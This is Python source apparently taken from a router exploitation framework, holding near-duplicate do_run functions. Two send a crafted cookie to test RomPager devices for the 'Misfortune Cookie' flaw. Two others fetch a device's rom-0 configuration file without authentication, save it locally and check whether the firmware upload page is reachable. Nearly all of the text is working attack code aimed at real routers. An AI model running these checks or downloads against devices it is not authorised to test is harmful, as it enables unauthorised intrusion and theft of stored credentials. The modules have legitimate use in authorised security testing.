def do_run(self, e):
#httplib2.debuglevel = 1
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
headers = {'User-Agent': user_agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
'Cache-Control': 'no-cache',
'Cookie': 'C107373883=/omg1337hax'}
target = 'http://' + self.host + ":" + self.port + '/blabla'
h = httplib2.Http(timeout=60)
h.follow_all_redirects = True
try:
response, content = h.request(target, 'GET', headers=headers)
if response.status != 404:
print_failed("Unexpected HTTP status, expecting 404 got: %d" % response.status)
print_red("Device is not running RomPager")
else:
if 'server' in response.keys():
server = response.get('server')
if re.search('RomPager', server) is not None:
print_green("Got RomPager! Server:%s" % server)
if re.search('omg1337hax', content.decode()) is not None:
print_success("device is vulnerable to misfortune cookie")
else:
print_failed("test didn't pass.")
print_warning("Device MAY still be vulnerable")
else:
print_failed("RomPager not detected, device is running: %s " % server)
else:
print_failed("Not running RomPager")
except socket.timeout: # Is there a better way of handling timeout in httplib2?
print_error("Timeout!")
def do_run(self, e):
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
headers = {'User-Agent': user_agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
'Cache-Control': 'no-cache',
'Cookie': 'C107373883=/omg1337hax'}
target = 'http://' + self.host + ":" + self.port + '/blabla'
try:
response = requests.get(target, headers=headers, timeout=60)
if response.status_code != 404:
print_failed("Unexpected HTTP status, expecting 404 got: %d" % response.status_code)
print_red("Device is not running RomPager")
else:
if 'server' in response.headers:
server = response.headers.get('server')
if re.search('RomPager', server) is not None:
print_green("Got RomPager! Server:%s" % server)
if re.search('omg1337hax', response.text) is not None:
print_success("device is vulnerable to misfortune cookie")
else:
print_failed("test didn't pass.")
print_warning("Device MAY still be vulnerable")
else:
print_failed("RomPager not detected, device is running: %s " % server)
else:
print_failed("Not running RomPager")
except requests.exceptions.Timeout:
print_error("Timeout!")
except requests.exceptions.ConnectionError:
print_error("No route to host")
def do_run(self, e):
target = "http://" + self.host + ":" + self.port
try:
response = requests.get(target + "/rom-0", timeout=60)
content_type = 'application/octet-stream'
if response.status_code == requests.codes.ok and response.headers.get('Content-Type') == content_type:
print_success("got rom-0 file, size:" + str(len(response.content)))
core.io.writefile(response.content, "rom-0")
else:
print_error("failed")
print_info("Checking if rpFWUpload.html is available")
response = requests.get(target + "/rpFWUpload.html", timeout=60)
if response.status_code == requests.codes.ok:
print_success("rpFWUpload.html is accessible")
else:
print_failed("rpFWUpload.html is not accessible")
except requests.RequestException:
print_error("timeout!")
def do_run(self, e):
target = "http://" + self.host + ":" + self.port
try:
response = requests.get(target + "/rom-0", timeout=60)
content_type = 'application/octet-stream'
if response.status_code == requests.codes.ok and response.headers.get(
'Content-Type') == content_type:
print_success("got rom-0 file, size:" +
str(len(response.content)))
core.io.writefile(response.content, "rom-0")
else:
print_error("failed")
print("Checking if rpFWUpload.html is available")
response = requests.get(target + "/rpFWUpload.html", timeout=60)
if response.status_code == requests.codes.ok:
print_success("rpFWUpload.html is accessible")
else:
print_failed("rpFWUpload.html is not accessible")
except requests.RequestException:
print_error("timeout!")
